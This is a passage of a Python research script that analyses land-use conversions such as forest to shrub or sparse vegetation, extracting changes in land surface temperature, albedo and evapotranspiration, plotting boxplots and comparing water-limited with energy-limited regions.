Rows/columns are\\\r\n    classes before/after conversion (Table XXXX in the paper):\")\r\nprint(conversions_sum)\r\n\r\n# Calling the results of Max_Change_Analyses.py\r\nEF = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/EF_to_other.nc\"\r\n)\r\nshrub = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/shrub_to_other.nc\"\r\n)\r\nherb = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/herb_to_other.nc\"\r\n)\r\nsparse = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/sparse_to_other.nc\"\r\n)\r\nwetland = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/wetland_to_other.nc\"\r\n)\r\nwater = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/water_to_other.nc\"\r\n)\r\nDF = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/DF_to_other.nc\"\r\n)\r\n\r\n# This is the map of water_energy limited areas with two classes\r\nWL_EL = xr.open_dataarray(\r\n\tin_dir + \"Water_Energy_Limited/Tif/WL_EL_Reclassified_reproject.nc\"\r\n)\r\nWL_EL = WL_EL.squeeze() \r\n\r\n'''----------------------------------------------------------------------------\r\n\t\t\t\t\tFunctions used in various parts of the script\r\n----------------------------------------------------------------------------'''\r\ndef find_coord(da, val, n):\r\n\t\"\"\"\r\n\tFind a specific value in an xarray object and return its coordinates\r\n\tda --> xarray object\r\n\tval --> value of interest to be found in da\r\n\tn --> index of the match if there are multiple replicates of val\r\n\t\"\"\"\r\n\ttmp = da.where(da == val, drop=True)\r\n\ttmp_stack = tmp.stack(z=[\"x\", \"y\"])\r\n\ta = tmp_stack[tmp_stack.notnull()][n]\r\n\tb = a.coords[\"z\"].values\r\n\tx = b.tolist()[0]\r\n\ty = b.tolist()[1]\r\n\treturn x, y\r\ndef plot_example(changed, not_changed, var, outname):\r\n\t# plot the example pixel (for presentations only)\r\n\tchanged.plot()\r\n\tnot_changed.plot()\r\n\tplt.axvline(2003, color=\"k\", linestyle=\"--\")\r\n\tplt.axvline(2006, color=\"r\", linestyle=\"--\")\r\n\tplt.axvline(2007, color=\"r\", linestyle=\"--\")\r\n\tplt.xlabel(\"Time\")\r\n\tplt.ylabel(var)\r\n\tplt.legend([\"LUC changed\", \"LUC not changed\"])\r\n\tplt.savefig(fig_dir + outname)\r\n\tplt.close()\r\ndef make_mask(data):\r\n\t# Filter data using np.isnan\r\n\tmask = ~np.isnan(data)\r\n\tfiltered_data = [d[m] for d, m in zip(data.T, mask.T)]\r\n\treturn filtered_data\r\ndef extract_vals(orig_class, val, var, conv_name):\r\n\t\"\"\"\r\n\tvar ---> Name of the variable we want to extract (lst/albedo/ET)\r\n\tval ---> Class number after conversion of the original class (orig_class)\r\n\torig_class ---> the xarray object of the original class conversion from Max_Change_Analyses.py\r\n\tconv_name ---> conversion name\r\n\t\"\"\"\r\n\timport numpy as np\r\n\r\n\tif var == \"lst\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp_lst = tmp_lst[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp_lst}, columns=[conv_name])\r\n\telif var == \"albedo\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = albedo_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"ec\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = EC_diff.where(orig_class == 
val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"ei\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = EI_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"es\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ES_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"ew\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = EW_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"et\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ET_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"eci\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ECI_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"esw\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ESW_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\treturn tmp_df\r\ndef myboxplot(df, title, ylabel, margin, outname):\r\n\tdf_mean = np.round(df.mean().values, 2)\r\n\tdf_sd = np.round(df.std().values, 2)\r\n\tq = df.quantile(q=0.75).values\r\n\tax = df.boxplot(figsize=(16, 10))\r\n\tpos = range(len(df_mean))\r\n\tfor tick, label in zip(pos, ax.get_xticklabels()):\r\n\t\tax.text(\r\n\t\t\tpos[tick] + 1,\r\n\t\t\tq[tick] + margin,\r\n\t\t\tstr(df_mean[tick]) + \"$\\pm$\" + str(df_sd[tick]),\r\n\t\t\thorizontalalignment=\"right\",\r\n\t\t\tfontsize=12,\r\n\t\t\tcolor=\"k\",\r\n\t\t\tweight=\"bold\",\r\n\t\t)\r\n\r\n\tplt.xticks(rotation=45, fontsize=16)\r\n\tplt.title(title, fontsize=20)\r\n\tplt.ylabel(ylabel, fontsize=16)\r\n\tplt.tight_layout()\r\n\tplt.savefig(fig_dir + outname)\r\n\tplt.close()\r\n\r\ndef myboxplot_group(df1, df2, df3, columns, txt_pos, outname):\r\n\r\n\tfig, ax1 = plt.subplots(figsize=(16, 8))\r\n\twidths = 0.3\r\n\tdf1_mean = np.round(df1[\"df\"].mean().values, 2)\r\n\tdf1_sd = np.round(df1[\"df\"].std().values, 2)\r\n\tdf2_mean = np.round(df2[\"df\"].mean().values, 2)\r\n\tdf2_sd = np.round(df2[\"df\"].std().values, 2)\r\n\tdf3_mean = np.round(df3[\"df\"].mean().values, 2)\r\n\tdf3_sd = np.round(df3[\"df\"].std().values, 2)\r\n\r\n\tax1.set_ylabel(df1[\"label\"], color=\"tab:orange\", fontsize=16)\r\n\tax1.set_ylim(df1[\"ylim\"])\r\n\tax1.yaxis.set_tick_params(labelsize=12)\r\n\t# Filtering nan valuse for matplotlib boxplot\r\n\tfiltered_df1 = make_mask(df1[\"df\"].values)\r\n\tres1 = ax1.boxplot(\r\n\t\tfiltered_df1,\r\n\t\twidths=widths,\r\n\t\tpositions=np.arange(len(columns)) - 0.31,\r\n\t\tpatch_artist=True,\r\n\t)\r\n\tfor element in [\"boxes\", \"whiskers\", \"fliers\", \"means\", \"medians\", \"caps\"]:\r\n\t\tplt.setp(res1[element], color=\"k\")\r\n\tfor patch in 
res1[\"boxes\"]:\r\n\t\tpatch.set_facecolor(\"tab:orange\")\r\n\r\n\t# Here we add the mean and std information to the plot\r\n\tpos = range(len(df1_mean))\r\n\tfor tick, label in zip(pos, ax1.get_xticklabels()):\r\n\t\tax1.text(\r\n\t\t\tpos[tick],\r\n\t\t\t# q[tick] + (q[tick]-lst_mean[tick])/2,\r\n\t\t\ttxt_pos,\r\n\t\t\tdf1[\"name\"]\r\n\t\t\t+ \" = \"\r\n\t\t\t+ str(df1_mean[tick])\r\n\t\t\t+ \"$\\pm$\"\r\n\t\t\t+ str(df1_sd[tick])\r\n\t\t\t+ \"\\n\"\r\n\t\t\t+ df2[\"name\"]\r\n\t\t\t+ \" = \"\r\n\t\t\t+ str(df2_mean[tick])\r\n\t\t\t+ \"$\\pm$\"\r\n\t\t\t+ str(df2_sd[tick])\r\n\t\t\t+ \"\\n\"\r\n\t\t\t+ df3[\"name\"]\r\n\t\t\t+ \" = \"\r\n\t\t\t+ str(df3_mean[tick])\r\n\t\t\t+ \"$\\pm$\"\r\n\t\t\t+ str(df3_sd[tick])\r\n\t\t\t+ \"\\n\",\r\n\t\t\thorizontalalignment=\"center\",\r\n\t\t\tfontsize=8,\r\n\t\t\tcolor=\"k\",\r\n\t\t\tweight=\"semibold\",\r\n\t\t)\r\n\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\tax2.set_ylim(df2[\"ylim\"])\r\n\tax2.set_ylabel(df2[\"label\"], color=\"tab:blue\", fontsize=16)\r\n\tax2.yaxis.set_tick_params(labelsize=12)\r\n\tfiltered_df2 = make_mask(df2[\"df\"].values)\r\n\tres2 = ax2.boxplot(\r\n\t\tfiltered_df2,\r\n\t\tpositions=np.arange(len(columns)) + 0,\r\n\t\twidths=widths,\r\n\t\tpatch_artist=True,\r\n\t)\r\n\t##from https://stackoverflow.com/a/41997865/2454357\r\n\tfor element in [\"boxes\", \"whiskers\", \"fliers\", \"means\", \"medians\", \"caps\"]:\r\n\t\tplt.setp(res2[element], color=\"k\")\r\n\tfor patch in res2[\"boxes\"]:\r\n\t\tpatch.set_facecolor(\"tab:blue\")\r\n\t# To make the border of the right-most axis visible, we need to turn the frame\r\n\t# on. This hides the other plots, however, so we need to turn its fill off.\r\n\tax3 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\tax3.set_ylim(df3[\"ylim\"])\r\n\tax3.spines[\"right\"].set_position((\"axes\", 1.1))\r\n\tax3.set_frame_on(True)\r\n\tax3.patch.set_visible(False)\r\n\tax3.set_ylabel(df3[\"label\"], color=\"tab:green\", fontsize=16)\r\n\tax3.yaxis.set_tick_params(labelsize=12)\r\n\tfiltered_df3 = make_mask(df3[\"df\"].values)\r\n\tres3 = ax3.boxplot(\r\n\t\tfiltered_df3,\r\n\t\tpositions=np.arange(len(columns)) + 0.31,\r\n\t\twidths=widths,\r\n\t\tpatch_artist=True,\r\n\t)\r\n\t##from https://stackoverflow.com/a/41997865/2454357\r\n\tfor element in [\"boxes\", \"whiskers\", \"fliers\", \"means\", \"medians\", \"caps\"]:\r\n\t\tplt.setp(res3[element], color=\"k\")\r\n\tfor patch in res3[\"boxes\"]:\r\n\t\tpatch.set_facecolor(\"tab:green\")\r\n\tax1.set_xlim([-0.55, len(columns) - 0.25])\r\n\tax1.set_xticks(np.arange(len(columns)))\r\n\tax1.set_xticklabels(columns, rotation=50, fontsize=11)\r\n\tax1.yaxis.grid(False)\r\n\tax1.axhline(color=\"k\")\r\n\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\tplt.savefig(fig_dir + outname)\r\n\tplt.close()\r\n\r\ndef ELvsWL(var, orig_class, val, WL_EL_class):\r\n\t'''\r\n\tvar --------->\tName of variable to be extracted (lst, albedo)\r\n\torig_class -->\tName of the conversion (EF, DF, shrub etc)\r\n\tval --------->\tClass number after conversion of the orig_class\r\n\tWL_EL_Class -> 1:Water limited; 2:water limited \r\n\r\n\t'''\r\n\tif var == \"lst\":\r\n\t\ttry:\r\n\t\t\ttmp_lst = lst_lulc.where(\r\n\t\t\t\t(orig_class == val) & (WL_EL == WL_EL_class), drop=True\r\n\t\t\t).values\r\n\t\t\ttmp = tmp_lst[~np.isnan(tmp_lst)]\r\n\t\t\ttmp_df = pd.DataFrame({class_name[WL_EL_class - 1]: tmp})\r\n\t\texcept ValueError:\r\n\t\t\t# tmp_df = 
pd.DataFrame({class_name[WL_EL_class-1]: np.nan})\r\n\t\t\ttmp_df = pd.DataFrame(\r\n\t\t\t\tnp.nan, index=[0], columns=[class_name[WL_EL_class - 1]]\r\n\t\t\t)\r\n\t# \treturn tmp_df\r\n\tif var == \"albedo\":\r\n\t\ttry:\r\n\t\t\ttmp_albedo = albedo_diff.where(\r\n\t\t\t\t(orig_class == val) & (WL_EL == WL_EL_class), drop=True\r\n\t\t\t).values\r\n\t\t\ttmp = tmp_albedo[~np.isnan(tmp_albedo)]\r\n\t\t\ttmp_df = pd.DataFrame({class_name[WL_EL_class - 1]: tmp})\r\n\t\texcept ValueError:\r\n\t\t\t# tmp_df = pd.DataFrame({class_name[WL_EL_class-1]: np.nan})\r\n\t\t\ttmp_df = pd.DataFrame(\r\n\t\t\t\tnp.nan, index=[0], columns=[class_name[WL_EL_class - 1]]\r\n\t\t\t)\r\n\t# \treturn tmp_df\r\n\r\n\tif var == \"et\":\r\n\t\ttry:\r\n\t\t\ttmp_et = ET_diff.where(\r\n\t\t\t\t(orig_class == val) & (WL_EL == WL_EL_class), drop=True\r\n\t\t\t).values\r\n\t\t\ttmp = tmp_et[~np.isnan(tmp_et)]\r\n\t\t\ttmp_df = pd.DataFrame({class_name[WL_EL_class - 1]: tmp})\r\n\t\texcept ValueError:\r\n\t\t\t# tmp_df = pd.DataFrame({class_name[WL_EL_class-1]: np.nan})\r\n\t\t\ttmp_df = pd.DataFrame(\r\n\t\t\t\tnp.nan, index=[0], columns=[class_name[WL_EL_class - 1]]\r\n\t\t\t)\r\n\t# \treturn tmp_df\r\n\treturn tmp_df\r\ndef extract_wl_el(orig_class, val):\r\n\tlst_EL_WL = []\r\n\talbedo_EL_WL = []\r\n\tet_EL_WL = []\r\n\tfor i in np.arange(1, 3):\r\n\t\tprint(i)\r\n\r\n\t\tdf_lst = ELvsWL(var=\"lst\", orig_class=orig_class, val=val, WL_EL_class=i)\r\n\r\n\t\t# if the number of pixels is less than 25 (25% of the 100 minimum)\r\n\t\t# we ignore the EL_WL analysis for the LUC conversion\r\n\t\tif len(df_lst) < 25:\r\n\t\t\tprint(\r\n\t\t\t\tf\"There are not enough pixels in the {class_name[i - 1]} area to make robust conclusions\"\r\n\t\t\t)\r\n\t\t\treturn\r\n\r\n\t\telse:\r\n\t\t\tdf_albedo = ELvsWL(\r\n\t\t\t\tvar=\"albedo\", orig_class=orig_class, val=val, WL_EL_class=i\r\n\t\t\t)\r\n\t\t\tdf_et = ELvsWL(var=\"et\", orig_class=orig_class, val=val, WL_EL_class=i)\r\n\t\t\tlst_EL_WL.append(\r\n\t\t\t\tpd.Series(df_lst[class_name[i - 1]], name=class_name[i - 1])\r\n\t\t\t)\r\n\t\t\talbedo_EL_WL.append(\r\n\t\t\t\tpd.Series(df_albedo[class_name[i - 1]], name=class_name[i - 1])\r\n\t\t\t)\r\n\t\t\tet_EL_WL.append(pd.Series(df_et[class_name[i - 1]], name=class_name[i - 1]))\r\n\r\n\tlst_EL_WL = pd.concat(lst_EL_WL, axis=1)\r\n\talbedo_EL_WL = pd.concat(albedo_EL_WL, axis=1)\r\n\tet_EL_WL = pd.concat(et_EL_WL, axis=1)\r\n\treturn lst_EL_WL, albedo_EL_WL, et_EL_WL\r\n\r\n\"\"\" ---------------------------------------------------------------------\r\nRegional analyses: The main criterion is that a LUC conversion should include\r\nmore than 50 pixels so that we can make robust conclusions \r\n----------------------------------------------------------------------\"\"\"\r\n\r\nprint('\\n----------------- Working on the entire region (takes several minutes/hours) -----------------\\n')\r\ncolumns = [\r\n\t\"EF_to_Shrub\",\r\n\t# \"EF_to_Herb\", \t\t# We ignore this conversion since the number of pixels including this conversion is less than 50\r\n\t\"EF_to_Sparse\",\r\n\t# \"DF_to_Shrub\", \t\t# We ignore this conversion since the number of pixels including this conversion is less than 50\r\n\t\"DF_to_Herb\",\r\n\t\"DF_to_Sparse\",\r\n\t\"Shrub_to_Sparse\",\r\n\t# \"Shrub_to_Wetland\",\t# We ignore this conversion since the number of pixels including this conversion is less than 50\r\n\t\"Herb_to_Shrub\",\r\n\t\"Herb_to_Sparse\",\r\n\t# \"Herb_to_Wetland\",\t# We ignore this conversion since the number of pixels including this conversion is 
less than 50\r\n\t\"Sparse_to_Shrub\",\r\n\t\"Sparse_to_Herb\",\r\n\t\"Wetland_to_Sparse\",\r\n\t# \"Water_to_Sparse\",\t# We ignore this conversion since the number of pixels including this conversion is less than 50\r\n\t# \"Water_to_Wetland\",\t# We ignore this conversion since the number of pixels including this conversion is less than 50\r\n]\r\n\r\ntmp_lst = lst_lulc.where(EF == 3, drop=True).values\r\nlst_EF_to_shrub = extract_vals(\r\n\torig_class=EF, val=3, var=\"lst\", conv_name=\"lst_EF_to_shrub\"\r\n)\r\n# lst_EF_to_herb = extract_vals(\r\n# orig_class=EF, val=4, var=\"lst\", conv_name=\"lst_EF_to_herb\"\r\n# )\r\nlst_EF_to_sparse = extract_vals(\r\n\torig_class=EF, val=5, var=\"lst\", conv_name=\"lst_EF_to_sparse\"\r\n)\r\n\r\n# lst_DF_to_shrub = extract_vals(DF, 3, \"lst\", \"lst_DF_to_shrub\")\r\nlst_DF_to_herb = extract_vals(\r\n\torig_class=DF, val=4, var=\"lst\", conv_name=\"lst_DF_to_herb\"\r\n)\r\nlst_DF_to_sparse = extract_vals(\r\n\torig_class=DF, val=5, var=\"lst\", conv_name=\"lst_DF_to_sparse\"\r\n)\r\n\r\nlst_shrub_to_sparse = extract_vals(\r\n\torig_class=shrub, val=5, var=\"lst\", conv_name=\"lst_shrub_to_sparse\"\r\n)\r\n# lst_shrub_to_wetland = extract_vals(\r\n# orig_class=shrub, val=6, var=\"lst\", conv_name=\"lst_shrub_to_wetland\"\r\n# )\r\n\r\nlst_herb_to_shrub = extract_vals(\r\n\torig_class=herb, val=3, var=\"lst\", conv_name=\"lst_herb_to_shrub\"\r\n)\r\nlst_herb_to_sparse = extract_vals(\r\n\torig_class=herb, val=5, var=\"lst\", conv_name=\"lst_herb_to_sparse\"\r\n)\r\n# lst_herb_to_wetland = extract_vals(\r\n# orig_class=herb, val=6, var=\"lst\", conv_name=\"lst_herb_to_wetland\"\r\n# )\r\n\r\nlst_sparse_to_shrub = extract_vals(\r\n\torig_class=sparse, val=3, var=\"lst\", conv_name=\"lst_sparse_to_shrub\"\r\n)\r\nlst_sparse_to_herb = extract_vals(\r\n\torig_class=sparse, val=4, var=\"lst\", conv_name=\"lst_sparse_to_herb\"\r\n)\r\n# lst_sparse_to_water = extract_vals(orig_class=sparse,val= 7,var= \"lst\",conv_name= \"lst_sparse_to_water\")\r\n\r\nlst_wetland_to_sparse = extract_vals(\r\n\torig_class=wetland, val=5, var=\"lst\", conv_name=\"lst_wetland_to_sparse\"\r\n)\r\n\r\n# lst_water_to_sparse = extract_vals(\r\n# orig_class=water, val=5, var=\"lst\", conv_name=\"lst_water_to_sparse\"\r\n# )\r\n# lst_water_to_wetland = extract_vals(\r\n# orig_class=water, val=6, var=\"lst\", conv_name=\"lst_water_to_wetland\"\r\n# )\r\n\r\ndf_lst = pd.concat(\r\n\t[\r\n\t\tlst_EF_to_shrub,\r\n\t\tlst_EF_to_sparse,\r\n\t\t# lst_EF_to_herb,\r\n\t\t# lst_DF_to_shrub,\r\n\t\tlst_DF_to_herb,\r\n\t\tlst_DF_to_sparse,\r\n\t\tlst_shrub_to_sparse,\r\n\t\t# lst_shrub_to_wetland,\r\n\t\tlst_herb_to_shrub,\r\n\t\tlst_herb_to_sparse,\r\n\t\t# lst_herb_to_wetland,\r\n\t\tlst_sparse_to_shrub,\r\n\t\tlst_sparse_to_herb,\r\n\t\tlst_wetland_to_sparse,\r\n\t\t# lst_water_to_sparse,\r\n\t\t# lst_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\ndf_lst.columns = columns\r\nprint(f\"saving LST_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_lst,\r\n\ttitle=\"LST\",\r\n\tylabel=\"$\\Delta$ LST [C]\",\r\n\tmargin=0.3,\r\n\toutname=\"LST_Boxplot.png\",\r\n)\r\n\r\nalbedo_EF_to_shrub = extract_vals(EF, 3, \"albedo\", \"albedo_EF_to_shrub\")\r\n# albedo_EF_to_herb = extract_vals(EF, 4, \"albedo\", \"albedo_EF_to_herb\")\r\nalbedo_EF_to_sparse = extract_vals(EF, 5, \"albedo\", \"albedo_EF_to_sparse\")\r\n\r\n# albedo_DF_to_shrub = extract_vals(DF, 3, \"albedo\", \"albedo_DF_to_shrub\")\r\nalbedo_DF_to_herb = extract_vals(DF, 4, \"albedo\", 
\"albedo_DF_to_herb\")\r\nalbedo_DF_to_sparse = extract_vals(DF, 5, \"albedo\", \"albedo_DF_to_sparse\")\r\n\r\nalbedo_shrub_to_sparse = extract_vals(shrub, 5, \"albedo\", \"albedo_shrub_to_sparse\")\r\n# albedo_shrub_to_wetland = extract_vals(shrub, 6, \"albedo\", \"albedo_shrub_to_wetland\")\r\n\r\nalbedo_herb_to_shrub = extract_vals(herb, 3, \"albedo\", \"albedo_herb_to_shrub\")\r\nalbedo_herb_to_sparse = extract_vals(herb, 5, \"albedo\", \"albedo_herb_to_sparse\")\r\n# albedo_herb_to_wetland = extract_vals(herb, 6, \"albedo\", \"albedo_herb_to_wetland\")\r\n\r\nalbedo_sparse_to_shrub = extract_vals(sparse, 3, \"albedo\", \"albedo_sparse_to_shrub\")\r\nalbedo_sparse_to_herb = extract_vals(sparse, 4, \"albedo\", \"albedo_sparse_to_herb\")\r\n\r\nalbedo_wetland_to_sparse = extract_vals(\r\n\twetland, 5, \"albedo\", \"albedo_wetland_to_sparse\"\r\n)\r\n\r\n# albedo_water_to_sparse = extract_vals(water, 5, \"albedo\", \"albedo_water_to_sparse\")\r\n# albedo_water_to_wetland = extract_vals(water, 6, \"albedo\", \"albedo_water_to_wetland\")\r\n\r\ndf_albedo = pd.concat(\r\n\t[\r\n\t\talbedo_EF_to_shrub,\r\n\t\t# albedo_EF_to_herb,\r\n\t\talbedo_EF_to_sparse,\r\n\t\t# albedo_DF_to_shrub,\r\n\t\talbedo_DF_to_herb,\r\n\t\talbedo_DF_to_sparse,\r\n\t\talbedo_shrub_to_sparse,\r\n\t\t# albedo_shrub_to_wetland,\r\n\t\talbedo_herb_to_shrub,\r\n\t\talbedo_herb_to_sparse,\r\n\t\t# albedo_herb_to_wetland,\r\n\t\talbedo_sparse_to_shrub,\r\n\t\talbedo_sparse_to_herb,\r\n\t\talbedo_wetland_to_sparse,\r\n\t\t# albedo_water_to_sparse,\r\n\t\t# albedo_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\ndf_albedo.columns = columns\r\nprint(f\"saving Albedo_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_albedo,\r\n\ttitle=\"Albedo\",\r\n\tylabel=\"$\\Delta$ Albedo\",\r\n\tmargin=0.005,\r\n\toutname=\"Albedo_boxplot.png\",\r\n)\r\n\r\nET_EF_to_shrub = extract_vals(EF, 3, \"et\", \"ET_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nET_EF_to_sparse = extract_vals(EF, 5, \"et\", \"ET_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nET_DF_to_herb = extract_vals(DF, 4, \"et\", \"ET_DF_to_herb\")\r\nET_DF_to_sparse = extract_vals(DF, 5, \"et\", \"ET_DF_to_sparse\")\r\n\r\nET_shrub_to_sparse = extract_vals(shrub, 5, \"et\", \"ET_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nET_herb_to_shrub = extract_vals(herb, 3, \"et\", \"ET_herb_to_shrub\")\r\nET_herb_to_sparse = extract_vals(herb, 5, \"et\", \"ET_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nET_sparse_to_shrub = extract_vals(sparse, 3, \"et\", \"ET_sparse_to_shrub\")\r\nET_sparse_to_herb = extract_vals(sparse, 4, \"et\", \"ET_sparse_to_herb\")\r\n\r\nET_wetland_to_sparse = extract_vals(wetland, 5, \"et\", \"ET_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_et = pd.concat(\r\n\t[\r\n\t\tET_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tET_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tET_DF_to_herb,\r\n\t\tET_DF_to_sparse,\r\n\t\tET_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tET_herb_to_shrub,\r\n\t\tET_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tET_sparse_to_shrub,\r\n\t\tET_sparse_to_herb,\r\n\t\tET_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# 
ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_et.columns = columns\r\nprint(f\"saving ET_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_et,\r\n\ttitle=\"ET\",\r\n\tylabel=\"$\\Delta$ ET [mm/year]\",\r\n\tmargin=5,\r\n\toutname=\"ET_Boxplot.png\",\r\n)\r\n\r\ndf1 = {\r\n\t\"name\": \"LST\",\r\n\t\"df\": df_lst,\r\n\t\"label\": \"$\\Delta$LST [C]\",\r\n\t\"ylim\": [-12, 12]\r\n\t}\r\ndf2 = {\r\n\t\"name\": \"Albedo\",\r\n\t\"df\": df_albedo,\r\n\t\"label\": \"$\\Delta$Albedo\",\r\n\t\"ylim\": [-0.5, 0.5],\r\n\t}\r\ndf3 = {\r\n\t\"name\": \"ET\",\r\n\t\"df\": df_et, \r\n\t\"label\": \"$\\Delta$ET [mm/year]\", \r\n\t\"ylim\": [-850, 850]\r\n\t}\r\nprint(f\"saving Boxplot_groups.png in {fig_dir}\")\r\nmyboxplot_group(df1, df2, df3, columns=columns, txt_pos=9, outname=\"Boxplot_groups.png\")\r\n\r\ndf_lst_mean = df_lst.mean()\r\ndf_albedo_mean = df_albedo.mean()\r\ndf_et_mean = df_et.mean()\r\ndf_lst_std = df_lst.std()\r\ndf_albedo_std = df_albedo.std()\r\ndf_et_std = df_et.std()\r\n\r\nframes = pd.concat([df_lst_mean,df_albedo_mean,df_et_mean,df_lst_std,df_albedo_std,df_et_std],axis=1)\r\nframes.columns = [\"LST Mean\",\"Albedo Mean\",\"ET Mean\",\"LST STD\",\"Albedo STD\",\"ET STD\"]\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n    print(\"\\n Mean and STD of the LST, albedo and ET after LUC conversion:\",\r\n          file=text_file,\r\n          )\r\n    print(frames, file=text_file)\r\ntext_file.close()\r\nprint(\"Mean and STD of the LST, albedo and ET after LUC conversion:\")\r\nprint(frames)\r\n\r\n\"\"\"---------------------------------------------------------------------------\r\n\t\t\t\t\tAnalyzing energy vs. water limited \r\n------------------------------------------------------------------------------\"\"\"\r\n\r\nprint('----------------- Working on the energy vs. water limited analysis -----------------\\n')\r\n# class_name = [\"High_WL\", \"Moderate_WL\", \"Low_WL\", \"Low_EL\", \"High_EL\"]\r\nclass_name = [\"Water_Limited\", \"Energy_limited\"]\r\n\r\nprint(\"Extracting EF to Sparse energy vs. water limited LST, albedo and ET\\n\")\r\n# EF to sparse conversion, for which we have enough data for EL_WL analyses\r\nlst_EL_WL, albedo_EL_WL, et_EL_WL = extract_wl_el(\r\n\torig_class=EF, val=5\r\n) # There are enough data\r\ndf1 = {\"name\": \"LST\", \"df\": lst_EL_WL, \"label\": \"$\\Delta$LST [C]\", \"ylim\": [-12, 12]}\r\ndf2 = {\r\n\t\"name\": \"Albedo\",\r\n\t\"df\": albedo_EL_WL,\r\n\t\"label\": \"$\\Delta$Albedo\",\r\n\t\"ylim\": [-0.5, 0.5],\r\n}\r\ndf3 = {\r\n\t\"name\": \"ET\",\r\n\t\"df\": et_EL_WL,\r\n\t\"label\": \"$\\Delta$ET [mm/year]\",\r\n\t\"ylim\": [-850, 850],\r\n}\r\nprint(f\"saving EF_sparse_EL_WL.png in {fig_dir}\")\r\nmyboxplot_group(\r\n\tdf1, df2, df3, columns=class_name, txt_pos=9, outname=\"EF_sparse_EL_WL.png\"\r\n)\r\nlst_mean=lst_EL_WL.mean()\r\nalbedo_mean=albedo_EL_WL.mean()\r\net_mean=et_EL_WL.mean()\r\nlst_std=lst_EL_WL.std()\r\nalbedo_std=albedo_EL_WL.std()\r\net_std=et_EL_WL.std()\r\n\r\nef_sparse_el_wl_df = pd.concat([lst_mean,albedo_mean,et_mean,lst_std,albedo_std,et_std],axis=1)\r\nef_sparse_el_wl_df.columns = ['LST Mean','Albedo 